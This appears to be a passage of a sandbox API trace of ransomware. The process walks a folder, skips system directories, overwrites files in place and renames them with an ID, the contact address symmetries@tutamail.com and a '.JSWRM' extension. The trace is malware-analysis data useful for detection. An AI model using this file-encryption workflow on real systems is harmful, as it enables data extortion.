1 [0062.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0062.701] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x13148, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="Setup.exe", cAlternateFileName="")) returned 1 [0062.701] lstrcmpiW (lpString1="Setup.exe", lpString2=".") returned 1 [0062.701] lstrcmpiW (lpString1="Setup.exe", lpString2="..") returned 1 [0062.701] lstrcmpiW (lpString1="Setup.exe", lpString2="...") returned 1 [0062.701] lstrcmpiW (lpString1="Setup.exe", lpString2="windows") returned -1 [0062.701] lstrcmpiW (lpString1="Setup.exe", lpString2="recovery") returned 1 [0062.701] lstrcmpiW (lpString1="Setup.exe", lpString2="perflogs") returned 1 [0062.701] lstrcmpiW (lpString1="Setup.exe", lpString2="documents and settings") returned 1 [0062.701] lstrcmpiW (lpString1="Setup.exe", lpString2="$RECYCLE.BIN") returned 1 [0062.701] lstrcmpiW (lpString1="Setup.exe", lpString2="system volume information") returned -1 [0062.701] lstrcmpiW (lpString1="Setup.exe", lpString2="msocache") returned 1 [0062.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0062.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Setup.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0062.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Setup.exe", cchWideChar=9, lpMultiByteStr=0x345f978, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Setup.exe", lpUsedDefaultChar=0x0) returned 9 [0062.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0062.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0062.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Setup.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0062.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Setup.exe", cchWideChar=9, lpMultiByteStr=0x345f948, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Setup.exe", lpUsedDefaultChar=0x0) returned 9 [0062.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0062.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0062.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c590 | out: hHeap=0x1e0000) returned 1 [0062.701] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0xc5158, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="SetupEngine.dll", cAlternateFileName="SETUPE~1.DLL")) returned 1 [0062.701] lstrcmpiW (lpString1="SetupEngine.dll", lpString2=".") returned 1 [0062.702] lstrcmpiW (lpString1="SetupEngine.dll", lpString2="..") returned 1 [0062.702] lstrcmpiW (lpString1="SetupEngine.dll", lpString2="...") returned 1 [0062.702] lstrcmpiW (lpString1="SetupEngine.dll", lpString2="windows") returned -1 [0062.702] lstrcmpiW (lpString1="SetupEngine.dll", lpString2="recovery") returned 1 [0062.702] lstrcmpiW (lpString1="SetupEngine.dll", lpString2="perflogs") returned 1 [0062.702] lstrcmpiW (lpString1="SetupEngine.dll", lpString2="documents and settings") returned 1 [0062.702] lstrcmpiW (lpString1="SetupEngine.dll", lpString2="$RECYCLE.BIN") returned 1 [0062.702] lstrcmpiW (lpString1="SetupEngine.dll", lpString2="system volume information") returned -1 [0062.702] lstrcmpiW (lpString1="SetupEngine.dll", lpString2="msocache") returned 1 [0062.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0062.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupEngine.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0062.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupEngine.dll", cchWideChar=15, lpMultiByteStr=0x345f978, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupEngine.dll", lpUsedDefaultChar=0x0) returned 15 [0062.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0062.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0062.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupEngine.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0062.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupEngine.dll", cchWideChar=15, lpMultiByteStr=0x345f948, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupEngine.dll", lpUsedDefaultChar=0x0) returned 15 [0062.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0062.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0062.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0062.702] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x48150, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="SetupUi.dll", cAlternateFileName="")) returned 1 [0062.702] lstrcmpiW (lpString1="SetupUi.dll", lpString2=".") returned 1 [0062.702] lstrcmpiW (lpString1="SetupUi.dll", lpString2="..") returned 1 [0062.702] lstrcmpiW (lpString1="SetupUi.dll", lpString2="...") returned 1 [0062.702] lstrcmpiW (lpString1="SetupUi.dll", lpString2="windows") returned -1 [0062.702] lstrcmpiW (lpString1="SetupUi.dll", lpString2="recovery") returned 1 [0062.702] lstrcmpiW (lpString1="SetupUi.dll", lpString2="perflogs") returned 1 [0062.702] lstrcmpiW (lpString1="SetupUi.dll", lpString2="documents and settings") returned 1 [0062.702] lstrcmpiW (lpString1="SetupUi.dll", lpString2="$RECYCLE.BIN") returned 1 [0062.702] lstrcmpiW (lpString1="SetupUi.dll", lpString2="system volume information") returned -1 [0062.702] lstrcmpiW (lpString1="SetupUi.dll", lpString2="msocache") returned 1 [0062.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0062.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupUi.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0062.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupUi.dll", cchWideChar=11, lpMultiByteStr=0x345f978, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupUi.dll", lpUsedDefaultChar=0x0) returned 11 [0062.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0062.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0062.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupUi.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0062.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupUi.dll", cchWideChar=11, lpMultiByteStr=0x345f948, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupUi.dll", lpUsedDefaultChar=0x0) returned 11 [0062.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0062.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c488 [0062.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0062.703] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5381000, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x5381000, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x5381000, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x75a8, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="SetupUi.xsd", cAlternateFileName="")) returned 1 [0062.703] lstrcmpiW (lpString1="SetupUi.xsd", lpString2=".") returned 1 [0062.703] lstrcmpiW (lpString1="SetupUi.xsd", lpString2="..") returned 1 [0062.703] lstrcmpiW (lpString1="SetupUi.xsd", lpString2="...") returned 1 [0062.703] lstrcmpiW (lpString1="SetupUi.xsd", lpString2="windows") returned -1 [0062.703] lstrcmpiW (lpString1="SetupUi.xsd", lpString2="recovery") returned 1 [0062.703] lstrcmpiW (lpString1="SetupUi.xsd", lpString2="perflogs") returned 1 [0062.703] lstrcmpiW (lpString1="SetupUi.xsd", lpString2="documents and settings") returned 1 [0062.703] lstrcmpiW (lpString1="SetupUi.xsd", lpString2="$RECYCLE.BIN") returned 1 [0062.703] lstrcmpiW (lpString1="SetupUi.xsd", lpString2="system volume information") returned -1 [0062.703] lstrcmpiW (lpString1="SetupUi.xsd", lpString2="msocache") returned 1 [0062.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0062.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupUi.xsd", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0062.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupUi.xsd", cchWideChar=11, lpMultiByteStr=0x345f978, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupUi.xsd", lpUsedDefaultChar=0x0) returned 11 [0062.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0062.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0062.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupUi.xsd", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0062.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupUi.xsd", cchWideChar=11, lpMultiByteStr=0x345f948, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupUi.xsd", lpUsedDefaultChar=0x0) returned 11 [0062.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0062.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0062.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c488 | out: hHeap=0x1e0000) returned 1 [0062.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0062.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0062.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf08 [0062.723] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0062.723] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=30120) returned 1 [0062.723] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0062.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x75a0) returned 0x2471a8 [0062.724] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x75a0, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x75a0, lpOverlapped=0x0) returned 1 [0062.728] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0062.728] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x75a0, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x75a0, lpOverlapped=0x0) returned 1 [0062.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0062.728] CloseHandle (hObject=0x450) returned 1 [0062.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c488 [0062.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0062.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0062.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0062.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0062.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0062.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0062.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0062.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0062.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0062.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0062.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225cb0 [0062.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0062.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0062.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225cb0 | out: hHeap=0x1e0000) returned 1 [0062.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0062.730] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd"), lpNewFileName="C:\\588bce7c90097ed212\\SetupUi.xsd.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0062.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0062.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c488 | out: hHeap=0x1e0000) returned 1 [0062.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf08 | out: hHeap=0x1e0000) returned 1 [0062.730] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6519be00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0x6519be00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0x6519be00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x17758, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="SetupUtility.exe", cAlternateFileName="SETUPU~1.EXE")) returned 1 [0062.730] lstrcmpiW (lpString1="SetupUtility.exe", lpString2=".") returned 1 [0062.731] lstrcmpiW (lpString1="SetupUtility.exe", lpString2="..") returned 1 [0062.731] lstrcmpiW (lpString1="SetupUtility.exe", lpString2="...") returned 1 [0062.731] lstrcmpiW (lpString1="SetupUtility.exe", lpString2="windows") returned -1 [0062.731] lstrcmpiW (lpString1="SetupUtility.exe", lpString2="recovery") returned 1 [0062.731] lstrcmpiW (lpString1="SetupUtility.exe", lpString2="perflogs") returned 1 [0062.731] lstrcmpiW (lpString1="SetupUtility.exe", lpString2="documents and settings") returned 1 [0062.731] lstrcmpiW (lpString1="SetupUtility.exe", lpString2="$RECYCLE.BIN") returned 1 [0062.731] lstrcmpiW (lpString1="SetupUtility.exe", lpString2="system volume information") returned -1 [0062.731] lstrcmpiW (lpString1="SetupUtility.exe", lpString2="msocache") returned 1 [0062.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0062.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupUtility.exe", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0062.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0062.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupUtility.exe", cchWideChar=16, lpMultiByteStr=0x241380, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupUtility.exe", lpUsedDefaultChar=0x0) returned 16 [0062.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0062.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0062.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupUtility.exe", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0062.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0062.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupUtility.exe", cchWideChar=16, lpMultiByteStr=0x241100, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupUtility.exe", lpUsedDefaultChar=0x0) returned 16 [0062.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0062.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0062.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0062.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0062.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0062.731] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0xa078, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="SplashScreen.bmp", cAlternateFileName="SPLASH~1.BMP")) returned 1 [0062.731] lstrcmpiW (lpString1="SplashScreen.bmp", lpString2=".") returned 1 [0062.731] lstrcmpiW (lpString1="SplashScreen.bmp", lpString2="..") returned 1 [0062.731] lstrcmpiW (lpString1="SplashScreen.bmp", lpString2="...") returned 1 [0062.731] lstrcmpiW (lpString1="SplashScreen.bmp", lpString2="windows") returned -1 [0062.731] lstrcmpiW (lpString1="SplashScreen.bmp", lpString2="recovery") returned 1 [0062.731] lstrcmpiW (lpString1="SplashScreen.bmp", lpString2="perflogs") returned 1 [0062.731] lstrcmpiW (lpString1="SplashScreen.bmp", lpString2="documents and settings") returned 1 [0062.731] lstrcmpiW (lpString1="SplashScreen.bmp", lpString2="$RECYCLE.BIN") returned 1 [0062.731] lstrcmpiW (lpString1="SplashScreen.bmp", lpString2="system volume information") returned -1 [0062.731] lstrcmpiW (lpString1="SplashScreen.bmp", lpString2="msocache") returned 1 [0062.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0062.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SplashScreen.bmp", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0062.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0062.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SplashScreen.bmp", cchWideChar=16, lpMultiByteStr=0x2411c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SplashScreen.bmp", lpUsedDefaultChar=0x0) returned 16 [0062.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0062.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0062.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SplashScreen.bmp", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0062.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0062.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SplashScreen.bmp", cchWideChar=16, lpMultiByteStr=0x2410d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SplashScreen.bmp", lpUsedDefaultChar=0x0) returned 16 [0062.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0062.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0062.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0062.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0062.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0062.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0062.732] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0062.732] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=41080) returned 1 [0062.732] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0062.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa070) returned 0x2471a8 [0062.732] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0xa070, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0xa070, lpOverlapped=0x0) returned 1 [0062.739] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0062.739] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, 